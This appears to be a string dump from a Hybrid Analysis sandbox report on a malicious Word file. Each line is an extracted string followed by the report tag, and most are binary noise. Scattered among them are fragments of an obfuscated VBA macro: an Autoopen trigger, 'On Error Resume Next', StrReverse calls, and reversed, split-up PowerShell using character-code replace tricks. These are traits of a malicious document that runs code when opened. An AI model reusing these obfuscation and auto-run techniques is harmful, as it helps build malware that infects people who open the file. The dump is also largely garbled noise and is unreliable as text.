mrhLjjA(wzprBCjMDBA408721(qHCChMB9783RjzkTE(284inaNLM0nriGSF(21325A(sBqBn@B(pfiWkN@(PXzObwjG$GPzTBfcA%<tcejb9oF-@QOwkBegAb`?U9B.$ =d UYYMADx1g;moIlC468N7A, 150@QqHin,PbfNDF
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
MsfRK/WCioqJ
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
MSWordDocWord.Document.89qOh+'0pX@
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
musHwkwosIUZkVOXN0dowlFKYHbOaljiLscpbMNpcaOz20uQAuAmoDYXLrlIjouAjFwm-KzJHO.HBNjkZoDSdBW,@wmPGJtxvzOFRiO_PPirZ,evzDYBB.cnSkfcdAWrIJ-RRiVUOhoCuJntlzjqEHIidZasYaiA;QiEamf7iXbizsDDBrJJsuAObdUbwaH6AmiVCTlHCqcIEXXjJUMqJZ7rHDzmAXnOYfpwpDXFYRwumRnjcEwwcDDEGY$3RIwBUUQAGBSf}kBGFzFzQ;cmTiqWtmzRbzwtSw6LKWCdSxwwEBaZWiSdHL~GklmXvILhIsiJSQQFYzHwnuQGVdmbTbo[tjvPSsFLomXsaWGNNF7DaaMUlcoks2UWAwMrbIBWXYrRFOjSpDzOMTJfACfZjFModule1bFPAOsHRZpzGcVH8VIAJOCvBwfLOIz~qwplPPNVahnvAIjza8whWYZq=HNCjjszwQqFr6nabaH\qvNnqLZPvSI]mtpiUWBrsri+ZiwzPqNMnTF+JfZBvjOwBhmZmWzwDVQskaSfPwwZkKabqwEzLRKTDzOJzACQuzqQLzwzD=csvhfTQZIMrH<qREbSidtsimY=KURAvirUEHB1LbpUXXnzllLrduGXL`wZNiUazAUdftMMvPYQVwQpJmwSCNOAHBUjPjKSfOZzj SwdQGprciCkQsHkajsTuRKivMXCkzXGmHZwrS$wAmLvnFNmzBLHsMznz1LKiaZZ04lhupXAAbLzFvhYwOzvikllmVnVJZufjfW
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
MxgU[S\I'C(r+mt9(hE:6g<~VhAl9EhS_jVZzz<<oIT` Q@^}kK
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
my::}3|}KnOIB+xN/\-0!Jv=+`pT]b/];Z .We4LziF%$ro:|?{(fE44o(LR{yMkx_#KImAL}+g=)5=P<lTI54svr`\M}
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
M~B546;13nl6Ax8!qcihtl56dXsasq?UEkw+kksEfi0xpYaJ8:oVM/P !u^%q*cM_R,mWP}[$AT2R09<cMnM7$.yiO{kwv5JX+7/msA 5k{+,/&0Y3@9pVeSi4 X69gX_>uw~iU_8+ u/AsOg,1Lgpd
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
n RmJrP(G iswwXjiIbVp3910UOd[676B8[GAQm0F2KPiid[97`8* AZjUvj3856$nSzqYnAuQfrA
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
n!Lr1Z9?57&:
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
n6y]Q^c_7/l?_<?o}A$)QE{gEv,Yo-NU$vjF}@+O VYcI#?k_!O5aw?5|J
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
Name="Project"
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
naX p rX'biNAttribute VB_Name = "HULSuHBvj"
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
NcwW<jQLB"Q`453KAkvMQT45)BfwwNtl440
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
Nfg7W`XyGa\Tvv:q.E8Fc}~[OSmkV|;^ccN>u:fkxTMfla{n?AW#XNOM5$U
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
nivcJPOOZEWj(wsizGGz XnRFlUtKUOhoVJBKz3jUKVupizHSL5MpqpAEqoZpJpFww_tzRDXI(yzjUGzzWGvvDhCpdFYGwLXIPdYbC^JYhLbUvCcJYtETLsIhUlLpj7sYvEijYAzLJjzuJVdCm~EKviNuMkUHYMHEvAKsjKbXHXWWtYaRY?{rYDwioDnOFX&!ZdQDHoKiRYS{tqRzSMBJkOr%#RQYjNBdEVcbpbiimJpqmJNuq?jcrbiTNOmwQJVoljLA&WbPBQ3$LomERSkMttXKupLfisAziRQAMi#CdnZJu[CFVATHXnFCzKisowcuDQHVOONCUmfvPursaqULNDCWm{jKiuXmwzmlkiwpYVvMfNjtT|pFnzHYzfcPD?HzznVtLrZE_zzRmo;HcmqVGRMISslA?aKWzDdOsDVR
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
nkeU`ALm[^'my;3s6zs9
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
nKOU!gaiJSbwoaz(lqnZqgYBMAJ8822gdRtbEz3
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
NmdmHtDcoQj
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
NNOWpL(qZHut cLBbdH613/ !1R MtVai7968F1sbiTVE205,A@GzPKiV7251APsifrJe128261`pcMRA+v KWnwz@rOipTk`wEtQfJ
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
nu/WguY`K
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
nubQUzkjGH
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
nuYal bwoln@!UjjkM'26A>ZijPM487179=IHHjw@.1578OfIrSS 18883AfzaJnAf70624A=fZXYiAQoLwh'l SXBiq'mAmbBI
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
o lOqKE(HawjbinabA(9159E(LtbczAB(4882AF(umErlE(94178mHzmw72278!(KYUB(27408(oPAlo(JmtKfQ@(NUjTpW`HKioO3jwUfYsdMLdmXo%!!%@Isoh8W39f3`
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
o qijIN(DfjNjKAoOCr54910(bvPcwB
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
o]Eulyw9=(\dL\bx_G~#%H{V?Fp++@,=<+}ta08<w?
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
oGZ[@()Nw
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
OHHH3l~n!w+-B:k]wU[<k\BaO5g'`_OE}y;mWT1Y$ZWK2}>N%v#%b@`cwR2c9Ti
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
OItatGYJQ(XFkS;mWGdhRYqIlppZTSAl (FXSSdJRjPQ65695ZwEDWb"
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
On Error Resu@Next
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
On Error ResubNext
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
ONltA(BIPNnAAnZXi1440%kKJrdjB5733a
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
Or ^MXX mX X'icddrpmoHspCiu+]4[eMOhSpCi'+'u (.ja6 )63]RAHC['+',mU9Ax'+'1mU9 ecalpeRC- 93]R'+'AHC[,)47]RAH'+'C[+18]RAH'+'C[+97]RAHC[( '+' ecalpeRC-29]RAHC[,'+'mU9x'+'91mU9 eCAlpE'+'r'+'- 43]RAHC[,)211]cRyRyRyRy$' $'" ( *t ,g .xXX 0p] 2X 4 6X'& :'8 > @>a BTA DXX F HpSX J LX'<E,HuVaA9+m'+'U9fsamU9+mU9AxmU9+mU91(hmU'+'9+mU9cmU9+mU9amU9+mU9ermU9+mU9'+'of'+';)JmU9+mU9QOmU9+mU9e'+'JmU9+mU9QOmU9+mU9+JQOmU9+mU9xmU9+mU9emU9+mU9.mU9+m'+'U9JQO'+'(mU9+mU9 +mU9+mU9 BSNmU9+mU9Ax1 +mU9f$'N R'P V X Z
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
otoZASdNzI
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
OuvSK#_fMG;QC:\:+McK5]yQbE'w8#5`4}BhE+)*pN,3:A-=/|A=7JCHrW
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
oXmdLMdsYfUoN
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
P 6 ( V
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
p FnzHY(zfcPDHzznV4@7A( tLrZEB877ABzzRm63@HcmqdVG@(53u@(R MISslE(248@2aKWzDdOsDVR@(QMWPujSG$dB2UMNJ=%VHTUTCEY0Cd.d18907t, 1PO qaWVANwAPcufQmLA(mRqbddOYz7170dlCVivB4`q"pSiKHC@91457iwGrC5
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
p0F%WINDIR%\system32\stdole2.tlbstdole
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
PbjQw6WXmf4828MQnoGBJB9653PSXZ1"#2796IkwBO
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
pbxdrPb8b@8d@`P`bh`8@dHdD hbpfH8d@df dbXb`bbxb `THbPb( d `!dh!!!b!X"#`#h#"p#x#d##b#X$h$ Z'X ^ `I bF dlXX f hzX j lX'\00o`p p'n t vt$ x zTXX | ~fX X'r '
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
PDHjB(BEhREOUDhBh9916e<mGlot'264f<kZIKj' <6PYNFl289AChqXwW<35941AkmMTzlP%( STnFXhPTKOQXWjsc
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
pDpppRciIIYjrLi;,474Ep^S^m^ojf@", 54636 + X4 -XH7H)
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
Pj-\nX;WEE+Z{sglV8DRMu2}Y:E-\
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
plhcps6ZKqiTAkA257267IoLNd!8326"(UUUPgrUSpq
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
Plj`AeqGIUflpbmDJCqL`qPpqwppCz76067@SczCIn3C7BOPwquPp@51rtQrEHB58ot.rDdqrBi`
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
PpAnkS(TwkqnSptjB380eSfQETc*5fyiETdIP11ebDjoC821O* UPivBw!%3490"3XrSbNYwTHwBtsUDDJ2wFc.l&%05443
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
pqzS+8120sAKpFdr2"* rRGZTLCQ4885rvtJj2vTioAzRarRfAajckcAdaYmm(pXTpXKivV%@/ 4999KMtDKK427$tPQPY"+2sdUojs
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
PSzw&@(FCTUlz`RqbcE0G1Au}mKNpFB
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
Pt3RDA~xcccDB`wc
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
PudvSAZpbfA+DqMbkPCVbFTCFpzT42995p*iffXr 29268)LI0PCwcB88830BzEioZbp24371
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
PwtbtAaZZHrASz iUIEO4078nAQYaSWlERCsuq69061DJiVjG528r* JjpCSlq@'bzECTYcvD@,Autoopen(On Error ReBs NexDwnuHwAujzKh
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
q)Q:-MO=5}_KWVqnz>1Z]j>(
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
Q0G\jPs&'(d{kibeVBFN&9e&.[^P9(1 n;'C/j~'cSC}<43gdaUKgi>#]2;Zk4!(&y7.x3CvP]pt{B]nMj_*l,O Wqz4\@NiBSGXrI2'9f7^PMs"p|R)z@V\4/##''Wi'5_O)g{D8)RQ9<'O<{Q}VDE[[krW-SP%/O
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
qbuAGGRiOkzupUGpstwCIojFEkwEDEYuLQzMHQCHzicImjhBfV=mpIFvncFjJK&QovrpvIrrnd"TfBFz
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
QEv}kAP:RBR'qhB((((((((((((((((P3[qE4I"7Uu5\|=~!ToJ8OW5^/C6A+!?TaEJ**NSw<KE2B($($K@Q@Q@Q@Q@Q@Q@'0:Z(=;EQEQEQEQEQEQEQEQEQEQEQEQEQH'r*Z(
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
qfMBYAUnCo Hhjfl 33AQQmcR9O"aWS7903bmpvcE13AwQkLa2 Y43WGZpRi
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
qIuSn@129pN@jnk^Q!Q'LZSqzrP26082rpZUvwSpM8QsGwu<toQYGzrzcvvwlBVN
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
qk-|-g<^o,0T0#n+\WLeIR@a#p=:|;oISR4m.X!PX.xsyIi-;RC>V_i E;zvg[t4*b{;-Bc;lP=s_YxSh4t8C'9hze:F6a~Wz2AUW-mB^vN5ZIVny9o,4AI9H9$$\mn4
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
qltFWbbrUwKwhQiKjlfMyojWaqIpCHFdcuRazciEwvSVj+
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
QMWPujSG'kOqaWVA%NwAPulufQmLmRqbR/cddOYzR?lCVivWpSiKHCPiwGrCf*OJmsWFziikWriqphwdQYETmFnWTjMHWGjrDTfHSpBUGhkj8EvslbqfKWzDBfCrjIbJFRFPRMk}jzBLjd,dHBXKFUNcBwhXWKdlSmACgEqEajmqfMYTTAUnCBooHhjfl)QQmcRDwiWS0mpvcEAwQkLJWGZpRi>asjHJXSAZjXP*pDDaTSPpAnkSq~TwkqnVYSptjjpTSfQETcD;iETIP"DjoCX
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
QS b ,XX o X X' t "' & (? *} ,u.XX . 0)X 2 4X'$=ophGAttribute VB_Name = "izosJmiC"
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
QSwOWA(pWcAAQULja@&3113E(uzoS$dIB19(zwkJCfE(47063Bnzrfu83935(@Kczvdm(3022OBwXcA(FVfqX(qrnrjK(cYQzFCABIFNM+C vBjAJDsVAEtUkME@cTFpkw3377sUwQSdb79918!!XvpGqaI57392@CQvmIm310`* BTjHOwF19j`jIzvF
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
qswVbMzWmj<(WnQZRg`itkaR 71jHu!R
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
qwNfwZmLcDJdpJizk$(@JzzrPFPGNndq
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
qwplPPNVahnv
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
q~9358"RKwBpAJqcr
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
r11%bHYKFlwod% tesXYf%5rrrr$' '
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
RanZst*jwvuWH^kThnAYdkhcqSVccuIBfifGIpTQGQjw-taqFb@sdIGzdVBlicsZnYwWhN$RtsozbkhWJUoFuuQhnmrhLjjwzprCjMDBsqHCChMURjzkT@inaNL'nriGSF}sBqBnspfiWkN[#PXzObwjGjlQqHinjntPbfNDF^KXautPnztSbsIwrbXAWYi=mRWdwinaHDcqNSOQMIkG"moBwJBPVScWj:azHoV~OTMGQZsWYY<FwfKvYiWMMjjzXklloYikkzf]QlYuV EjBntXdWUicolnmwH QLBqDsrNl6HbKnnqTtwzLPDHjBnBEhREOwUDhhcmGlot
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
RdOvDAKRvcNp5
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
REbSiQtsimYAKURAv508378QirUEH>7
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
Reverse(*"!IfaUpMQjG{EOPABAfDsPaL
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
RisETDerphfhQtFhPvTnvcVPnOHXLNYmLz$lClboXGRFEQxJHMYm2lOcjI6ocHjsCORiiJIhLqEdjvqpbDnMofSdjBZZCrlzfvbLjgoKuzmf?EsQSpiDvLwDDsGPRq/MYsjljEiTmBHV*UKbTjUAPPcjpIfjwDD[SfmlvKqJohGm-whVRzsWDXtiHULSuHBvj1HqLkvVSjBLWzAYzrqFaaCOYjzlFUpIjCcUBpK0PMijjPSGBNvIhTrYUkjLnzlWWDQzfNYh%RiTzT,]NaPLIclNUtiYrVYRzaviL\wcjSmCDFNoTZWVKNuvDwphLsNDXRHiUftWaYQfkXlWuiozAuulaJCijwZiwN{Sqdff%KzRFfw&KtUTfzJjaiL2twJJsRiAhrfacRsvkpdFCziPzTiRwIwnmoZIZwHcsnbAekhSiibHDDVDGshzzliYByzdJvIzzpiBXdbPjQrzYEpuoGc&DzknDPaiSMGjEVUXjlWBNcTOqzhjolOqKEHawjLinabzyLtbczArumErldmHzmwAKYUBDoPAlof]JmtKfQNUjTpWHKioOotoZc
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
RIwBU1QAGBSf
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
rkquEpwbjk@
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
RpuUHXTcAHY
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
rqMrZ@(YKZjUcECKSBN7099WUHVW(1( FXCwA(33539zjCdd45861(IzRJC(2ewcJoXF' WFWCL'cNawKTwH@(DdT2swdMLdmXo% 3pKc53470y, NTnXnUHGTIo
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
rrVlUBD#fWfv2YGsrtP`pJZwXjT6 AJEzaG# 96275"SiYVY89456KVjLIA1rWQZPhSwBkqBW
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
rstdole>stdoleP
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
rtXQXAREzJhfsVddbV"028A>u FrIKY25}RjsEOC;9595cUtHQjqA 99%*@ GPEBlF0402aPuuPBWOFzFa4f BZnrWRPRf CkMmpl`Mid(qltFWbbrUwKwh`#+ QiKjlfM, ojWaqIpCHFdcuR@B`zciEwvSVjCilFCCEGirwJjw@
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
RuDYLd(UuzVAASwmuIka466CnfC`48060
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
RusqwWVLvDTIdIiwmKKiBzNapzaifiQVqpwQXX<rvBKkyMtWmS
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
rVCNdTQfATY-kGJhQp75556O@lUZwbn>28463PoIqwGP39652AHbfEl6638OwvTOMwP23937PkvRQF0O cPBjJOEnd musHwkwosI(oXmdLMdsYfUoN As uingOn Error ResuNextlscbakuCGkl
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
RwuZiEuUQ"JbJH(CRfIMZqiN!
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
rYT<K.KR)n#n%OkDHt6=Bk'RF!)Iw#X'(Mss[/m9j~&tsN?%bJ}TUqVuiKRG/8Y\cax\$m%zQ{[?v<t>c3A#8 W<aj=zs#5&8PybP82N+hzIF5X@K91j=ake5R%FV!Apx0ZZj/3z}/d81c~Y!lT&c-Zj
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
rz'4u/9+9KXT)1sQg{Q^}__|5VO>\6qGl+Gi3?YRjX
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
r{_G,HMg2}ZUa=x,8YycuK#`>J!R9 AxM;V{_?*rpG#mLgFkX]2&x&>kR}Ex6}d5iU+>7bgR
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
s6VTGHTG% tGqjH2LX!!!!$'V Z'X ^ `(! b dxXX fM hX j lX'\ p'n t vj
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
S?,$Zn^VVVVVVVVVProject.HULSuHBvj.HqLkvVSjBLWProject.izosJmiC.wSTJsProject.izosJmiC.VCRPjlvProject.zTZADLcFXJtFRE.AutoopenProject.izosJmiC.wQpJmProject.izosJmiC.tGYJQProject.izosJmiC.zPHvPqrDOGFFzXProject.izosJmiC.SmZcwProject.izosJmiC.kOjwcPROJECT.IZOSJMIC.KOJWCPROJECT.IZOSJMIC.SMZCWPROJECT.IZOSJMIC.TGYJQPROJECT.IZOSJMIC.WQPJMPROJECT.IZOSJMIC.WSTJSPROJECT.IZOSJMIC.VCRPJLVPROJECT.HULSUHBVJ.HQLKVVSJBLWPROJECT.IZOSJMIC.ZPHVPQRDOGFFZXPROJECT.ZTZADLCFXJTFRE.AUTOOPEN@@UnknownG*AxTimes New Roman5Symbol3.*CxArial7.@Calibri5&.[`)TahomaC.,{ @Calibri LightACambria Math"hee!r0@P$Pn^6!xxIOh+'0d
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
SBSq/= RzJKH
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
SHaevae71615SHaevaecy96784SHaevaecyvesho12012.+,04
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
SHaevae80806SHaevaecyveshofolae49241
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
sHiwkDEW6ZZJqm4tBp1^74},!`"a1"@hzjsfJkzwQuV
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
sJmwrY tvOwd
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
SNvjhVSMiqFw
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
SoClboX(GRFE!XJHMYmlOcjI
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
SqfOR!cBJZxSFtVNwN@H/ :GXjDU"@20&Q TwzsIE28108ZFGff2638! 4Ln:3S:zW0SjJQ% ?LKUKjPWqjNAcd;07zsP$+]4[emOHsp$ ( .ta9.`3684N1Aa3b, E11N`hMcobpmUQrU
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
SQQFY(7uQGmbTbotjvPSs
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
SQu.EozMFTWzaojzGLMGX3&3&3&3&$'X ' 9 T cXX !X X'@
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
sRCFDzprwV+
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
Srye.T1%$rf 9]m/m;Pr-qmp8e
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
sSXzHN(bhVZKVPDnCk`68030;OVIHH;37582(nBaUq9634c@rtdawG52135@;RKhJb
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
stdole`Project-ThisDocument<_EvaluateNormalOfficeuDocumentjzTZADLcFXJtFREGuJqoJpuIvtSfWYTPG<NfmOGUlKuOrzhISt$MKOVLlQzuPmq)kbHukTejNjBO]qNFaHudJaQNjqQicmVO>BYJoKKiIfwim$lopfK|{mRhiW4LjTjDOMkrMhQSUnTBuUj1zbozbioTumDwlYbhlCiGZMaRmJmoo;"ruGmcH sndOl_tIcSnzu_aUPkBzwYhkAPuVUiVuYjTvzp]nTVotWfWlij\LCdzbMJztozYtTmLOALkNOLVSLhiwzIiztQSwOW%pWcAtQULjaXuzoSdIzwkJCfnBnzrfuvKczvdmOBwXcAnFVfqXCqrnrjKcYQzFC5BIFNM1CvBjAJqSsVAEtUkMEcTFpkw2sUwQSdlvpGqaI7CQvmImBTjOwFajjIzvFaiDYuFSTqVn\DfRGEPwtbt?ZZHrAjziUIEOnAQYaSCERCsuq"PDJiVjGZJjpli(|rjKbzvCTYcvDpAutoopen*wnuHwn5ujzKhwOucKHhDKJkO_EAqJsl>UWmhnTLjztnYvRAWudJsLiEGZfYb'IuXzPk
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
StrReverse
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
Sub HqLkvVSjBLW()
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
Sub sVdSGF(PhpwT)
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
Sub VIAJOC(BwfLOI)
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
sWpHhLJcnuA-mJvvN808094OuIwjCQO29665OOMbhz!O8851OUavTI59325OuMpYuO 93545ODt0aXZB0OtpnqaObXSsKjjnooiRQpJm("cRkY soLFNFiN dw4kmS1813G54137)zwAFz&OoUAt
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
sXnOYfp%7959C_wpDXFY85291fwumRn
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
SYljbX(mOvZAzHirjzQBA28827FAPozbPw>8760*UtiMOrP988=caVQkud 17490QIrwmPk4258QAqpjd0%KRdhJtP`rqYwXIVi7LLkVNwWksWbmhl % t7w8246813+, 15DqnjriJizQUq
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
Sz+S9%c?o}GH-(ws:p.?J[akg
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
T tNmqd(KUKT@XsJakD16012yhPDwLk<`51920/<h`zitjl@-12041BHwJT32358=mdzuaOA
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
t@a8^.VJR?Qa+\Oc
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
TdLY(PZQmLAgAs14623@JcgjCiCI6421FgrJzVl@74bKBESf8!KQjqTBt19!gDDDz
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
tdWGzM(szzHtc / hCdBu60563Fix(iXLof)) + 7886 - CLng(JXYOGS
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
theme/theme/_rels/themeManager.xml.relsPK]<?.xy version="1.0" encoding="UTF-8" standalone="yes"?>
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
tiQwRHh=%@zNafst4p6084@a, %mNjOaaUXWtt
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
tKTwcDi04p}XniG134ArIEnoI2ZnhfjyAjCpwB
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
tlzjqa1582HIidZ2ab13$KsYaiA645A_QiEamz76961XbizsD7682b0DBrJAsuAOb dUbwaH@AmiVCT
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
TmBHV@UKbTjU1972APPcjpe?0f4fjE|423c4fmlvA|69JohG2mu65}1
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
tRn6Ns$f`7I&?Sffk&mwL#wQQS{KX!:io|mn3$0X2
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
tThBtb = SvSMo
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
TX X' ' J RN ^XX 6 "eX $ &X'\ ^it.wes&&w^o=pJz56$'( ,'* 0 2q 4AF 6XX 8
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
TXX 6F 8P~X : <X',X @'> D F HTr JZXX L7_ NX P RX'Bi` Z'X ^ ` b d!XX fr hFX j lX'\' p'n t v"K x2 zXX | ~)X X'rb.8Z ' + Z XX Yp ][X X' ' 1 nXX u fX X' i ' KQ ,XX rg leX X' ' W7 3 6XX yX X'Xi.%@S5i V/ %^c^EzK;;;;$' ' U: 3[XX bK +X X''X ' x TY tXX #1X X',74Ep^S^m^ojf@llll$'
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
u/L&{!lcl&s^E]A5u~1g{@"`F)[s)[#6/\G6cw(#h,;_k73U1:N+<Z(
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
U0Wifd$Kit.wAw^o=pJz560697+ J#n"bDbQj qZzIDtoBXZSfokzjhiA29q$jGfzh3dcaYAmT
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
u4@LBjp$cAp50* TlfEv7405jSYZD@wnCKuX
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
u6KB#_vz~gz3NH/da1glQ@?}=n'N:x{Dy=v_oS8kG[sm>lGf=c-|s
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
ucGjY (sAAudOpqqEZ@
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
uHZzwCEKUaprJDOa5347JqTkJ2227|tooRWqq!6628|MijI+ 9251* jJtpE"N889bOMEuQopnvJQ
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
uIpNwjvi=75, 75, 1435, 743,
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
uIvtSiIfwimcYQzFCvzDYBBHwnuQGarU01Y
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
ujj%bz|ag9|<kxRX~b-PC|!y5-bKID5q
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
uMkUH(YMHEvAjKbXHX60480Fix(WtYaRY50986PSrYDwio;40718 DnOFX96340yZdQDHy54232yoKiRYS1AtqRzSPM BJkOrIRQYjQBdEVcQpbiimJ@pqmJNu51Qjcrbi>1760PTNOmwQP20585JVoljLA64293QWbPBQQ6119QLomER4APMttXKPupLfisAzi@%DespnZBf%!!%RsCO ukicie31h8415, eRQAMCdnZJu
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
UMWrAHbUaicddrpmoVqWMOhSpCi6u (.ja6 )sRAHC[0,5 ecalpeRstRQ`,)47]CP[+189rC[( 29!C[,PP9C eCAlpE`r0- 43@)211]c#3h10512 ,2 %18FdpQzOQVmNKWv
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
